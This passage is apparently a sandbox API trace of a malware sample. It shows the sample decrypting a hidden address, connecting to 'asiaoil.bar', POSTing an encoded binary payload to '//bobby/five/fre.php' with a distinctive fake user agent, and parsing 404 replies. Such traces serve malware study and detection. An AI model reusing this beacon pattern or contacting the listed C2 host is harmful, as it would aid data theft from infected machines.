(hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.663] GetProcessHeap () returned 0x740000 [0321.663] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758508 | out: hHeap=0x740000) returned 1 [0321.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.664] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0321.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.679] CryptDestroyKey (hKey=0x74d768) returned 1 [0321.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.681] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0321.681] GetProcessHeap () returned 0x740000 [0321.681] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0321.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.682] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.684] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.685] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.686] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.686] GetProcessHeap () returned 0x740000 [0321.686] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf30 [0321.686] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.687] GetProcessHeap () returned 0x740000 [0321.687] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf30 | out: hHeap=0x740000) returned 1 [0321.687] GetProcessHeap () returned 0x740000 [0321.688] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0321.688] GetProcessHeap () returned 0x740000 [0321.688] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0321.688] GetProcessHeap () returned 0x740000 [0321.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0321.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.699] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d8f8) returned 1 [0321.705] GetProcessHeap () returned 0x740000 [0321.705] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0321.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.706] CryptImportKey (in: hProv=0x75d8f8, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0321.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.707] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.708] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.708] GetProcessHeap () returned 0x740000 [0321.709] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0321.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.710] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0321.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.711] CryptDestroyKey (hKey=0x74d768) returned 1 [0321.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.712] CryptReleaseContext (hProv=0x75d8f8, dwFlags=0x0) returned 1 [0321.712] GetProcessHeap () returned 0x740000 [0321.712] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0321.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.713] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0321.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.713] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0321.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.714] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0321.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.715] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0321.715] GetProcessHeap () returned 0x740000 [0321.715] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0321.715] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c310*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c460*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0321.718] GetProcessHeap () returned 0x740000 [0321.718] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b580 [0321.718] socket (af=2, type=1, protocol=6) returned 0x360 [0321.718] connect (s=0x360, name=0x75c310*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0321.739] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c310*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c460*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0321.739] GetProcessHeap () returned 0x740000 [0321.739] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0321.739] GetProcessHeap () returned 0x740000 [0321.739] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0321.740] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0321.741] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0321.741] GetProcessHeap () returned 0x740000 [0321.741] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0321.741] GetProcessHeap () returned 0x740000 [0321.742] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0321.742] GetProcessHeap () returned 0x740000 [0321.742] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763b30 [0321.742] GetProcessHeap () returned 0x740000 [0321.742] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0321.742] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0321.743] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0321.743] GetProcessHeap () returned 0x740000 [0321.743] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0321.743] GetProcessHeap () returned 0x740000 [0321.743] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0321.744] send (s=0x360, buf=0x747928*, len=243, flags=0) returned 243 [0321.744] send (s=0x360, buf=0x761fd0*, len=159, flags=0) returned 159 [0321.744] GetProcessHeap () returned 0x740000 [0321.744] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0321.744] recv (in: s=0x360, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 569 [0321.888] GetProcessHeap () returned 0x740000 [0321.888] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0321.889] GetProcessHeap () returned 0x740000 [0321.889] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0321.889] GetProcessHeap () returned 0x740000 [0321.890] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0321.890] GetProcessHeap () returned 0x740000 [0321.890] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0321.890] closesocket (s=0x360) returned 0 [0321.890] GetProcessHeap () returned 0x740000 [0321.890] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b580 | out: hHeap=0x740000) returned 1 [0321.890] GetProcessHeap () returned 0x740000 [0321.891] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0321.891] GetProcessHeap () returned 0x740000 [0321.891] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0321.891] GetProcessHeap () returned 0x740000 [0321.891] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0321.895] CreateThread (lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08) Thread: id = 65 os_tid = 0x13ac Thread: id = 66 os_tid = 0xab0 Thread: id = 67 os_tid = 0xc20 Thread: id = 68 os_tid = 0x22c [0269.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0269.998] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:49:44 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=GCmC0Xn7x60XKID%2BbyVFh2XD%2FIwnZcxxQGnGkstZmNro7Y9uOL8zHhDeiqd8lu40FiquBq%2FVhCMjVXxB3BzDApJq7%2BPhclwwlTJD2MGhMHYyTy3lHIjee92jOWo%2F%2BQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36634382e692b-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.998] GetProcessHeap () returned 0x740000 [0269.998] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0269.999] GetProcessHeap () returned 0x740000 [0269.999] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0269.999] GetProcessHeap () returned 0x740000 [0269.999] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 Thread: id = 69 os_tid = 0x694 [0282.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0282.644] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:49:57 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Fe9TqxqAVUHyOGJVXHtzm1fK8%2B2PNU50EPjVDOgCRQofOwWtoHOYAHBOzPz97RBnHuyPzVHSmYDMza1AC6r%2B47zP5xSg88CMO0DDURVhdRynulhoo9Fxp4WSeyEO2Q%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366839ccf92c5-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.644] GetProcessHeap () returned 0x740000 [0282.644] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0282.644] GetProcessHeap () returned 0x740000 [0282.644] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0282.644] GetProcessHeap () returned 0x740000 [0282.645] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 70 os_tid = 0x1014 [0293.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.230] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:07 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Ew9b2K4tH0j8n%2BP%2FL5MPMljwgrG4RpcaU%2F1jz%2Bcb33JucWSpX3%2FVxTveduDYmnrWbBTC7BWi%2Ba0Qql2yBW7tKJciUPx%2BjcloJRsR8AWnDEun%2B77hy1iQr%2FSTzu2uAw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366c6c82490d6-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.230] GetProcessHeap () returned 0x740000 [0293.230] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0293.230] GetProcessHeap () returned 0x740000 [0293.230] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0293.230] GetProcessHeap () returned 0x740000 [0293.230] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 71 os_tid = 0x101c [0293.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.792] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:08 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=iIrgBpApSVlJjlQjhBY2ZFkwWpVfZBfWttiZuYABiQtrgsibeaWawzbVvjt4qzL%2FudczsEgBrGJohsrUSL0C%2BGgkQRXRm94za30Fwt2EuaHO1ok%2BpUFymSF%2Be1RwBA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366cae87068fb-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.792] GetProcessHeap () returned 0x740000 [0293.792] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0293.792] GetProcessHeap () returned 0x740000 [0293.792] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0293.792] GetProcessHeap () returned 0x740000 [0293.793] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 72 os_tid = 0x1020 [0295.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.150] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:09 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=MvUxt77%2FviVCmiEXoyUpqAQ%2BpxBZN%2Finq%2BXzmiqujE5u6MF41UwRzMwo9JwfDfl%2FBHBuPN3tpUdlloOfSc4dwigTG%2BPHxfB8GEbGmXVfKAOihsqJOwQR65dvcM8XcQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366d0a9099183-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.150] GetProcessHeap () returned 0x740000 [0295.150] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0295.150] GetProcessHeap () returned 0x740000 [0295.150] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0295.150] GetProcessHeap () returned 0x740000 [0295.151] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 73 os_tid = 0x1024 [0295.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.974] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=yQjuYkStGdXMIp9u91rLsfZ3noKGozPKzwHcaNcBdoxQOlv1HoNz4V1baJIAFnH8hMOZVerrTdSEipIA182K5Jl1i4nWaEvQHi83t01SnY%2FsUzapCV4cMHuaWV%2Bj6A%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366d68c1e6904-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.974] GetProcessHeap () returned 0x740000 [0295.974] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0295.974] GetProcessHeap () returned 0x740000 [0295.974] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0295.974] GetProcessHeap () returned 0x740000 [0295.975] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 74 os_tid = 0x1028 [0296.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.683] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:11 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=824E6NJx4SsiPzpeS9vsNFfYNjpKZlZEsnyShg2HZwwmbDWHiZVWPF1%2FcVI%2BPfNbs0bgjSOHhvUrwBQm%2FtzlBBSbVH0%2BOL92EBod8NC91wmOQYeN9qehMX4vCZDfHQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366db6feb6939-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.683] GetProcessHeap () returned 0x740000 [0296.683] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0296.683] GetProcessHeap () returned 0x740000 [0296.684] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0296.684] GetProcessHeap () returned 0x740000 [0296.684] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 75 os_tid = 0x1030 [0297.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0297.812] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:12 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=KboZc7XrZo9Ea8NQZJGZ0Rt0XUQhFcCmgFUaR%2FpJpaYmB4WC%2FrxYXYudw8Y8k1XDimpz4%2B%2FWySt6y2KjtDBcNHgdIGBaHBqop5RMtw6JgE8i7qqOVTyjbDUSJVi%2Bxg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366e23f8e92ba-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.812] GetProcessHeap () returned 0x740000 [0297.812] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0297.813] GetProcessHeap () returned 0x740000 [0297.813] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0297.813] GetProcessHeap () returned 0x740000 [0297.813] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75da80 | out: hHeap=0x740000) returned 1 Thread: id = 76 os_tid = 0x1038 [0298.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0298.994] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:13 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=O%2B2h4UccjqGHIQsHJwCje6qHJ9j0aGRDWjJul3nezlQVq5PK5KaFHqtiOUpA7%2F8xsrcXDQ01dTp8flRxICMriEw%2BKn9p6GjIWWJvQMZrDr7l8y%2Buz8%2BEmnuuEIgtjA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366e9e8ca6943-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.994] GetProcessHeap () returned 0x740000 [0298.994] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0298.994] GetProcessHeap () returned 0x740000 [0298.994] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0298.994] GetProcessHeap () returned 0x740000 [0298.995] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 77 os_tid = 0x103c [0299.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.593] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:14 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=uU6T0FWl%2BRxYCb%2FYJ5h9j25Eu2z7lIY0ELzXG6u8OrsaFyBkNxtSx9%2F%2Bw5WuX%2F271zbja7oDV04wO7tc0Z%2Fq19WQo5RNZzsIDVTL10%2F2UM04bzN2BGs9ntnnBJFg5w%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366ee49096939-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.593] GetProcessHeap () returned 0x740000 [0299.593] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0299.593] GetProcessHeap () returned 0x740000 [0299.593] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0299.593] GetProcessHeap () returned 0x740000 [0299.594] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 78 os_tid = 0x1040 [0303.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0303.106] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:14 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=cbzkmNxMbhpT8cRk1Hfk%2BPHXKpv%2FbDlC9s7knC%2F0bL8YzrWKURwf7dcSf%2BCAK72m8lV7%2BwmTQhRISeDDntriJp7tz1otiUCQcalb1E8Afxkl8TYNS7py%2B2mbVLv1Uw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db366f1a9ea9255-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") 